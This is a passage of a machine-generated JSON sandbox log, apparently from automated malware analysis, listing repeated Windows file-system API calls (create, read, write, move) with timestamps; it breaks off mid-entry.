"timestamp": "2016-02-16 17:41:46,329", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,329", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,329", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,329", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,329", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,329", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,339", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,349", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,359", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,369", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,369", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,389", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,389", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,389", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,389", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,389", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,399", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,399", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,399", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,399", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,399", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,399", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,399", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,399", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,399", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,399", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,409", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,409", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,419", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,419", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,419", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,419", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,419", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,419", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,419", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,429", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,429", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,429", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,429", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,429", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,429", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,429", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,429", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,439", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,439", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,439", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,439", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,439", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,439", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,439", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,439", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,439", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,439", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,459", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,459", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,459", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,459", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,469", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,479", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,479", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,479", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,479", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,479", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,479", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,479", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,479", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,479", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,489", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,499", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,499", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,499", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,499", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,499", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,499", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,499", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,499", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,499", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,509", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,519", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,529", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,529", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,529", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,529", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,529", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,529", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,529", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,529", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,539", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,539", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,549", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,549", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,549", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,549", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,549", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,549", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,559", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,559", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,559", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,559", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,559", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,559", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,559", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,559", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,569", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,579", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,589", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,589", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,589", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,589", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,589", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,589", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,599", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,599", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,599", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,599", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,599", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,599", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,609", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,609", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,609", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,609", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,609", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,619", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,619", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,619", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,619", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,619", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,619", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,619", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,619", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,629", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,639", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,639", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,639", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,639", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,639", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,639", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,649", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,649", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,649", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,649", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,649", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,659", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,659", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,659", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,659", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,669", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,669", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,669", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,669", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,669", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,669", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,669", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,679", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,689", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,699", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,699", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,699", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,699", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,699", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,699", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,699", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,709", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,709", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,709", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,709", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,709", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,709", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,709", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 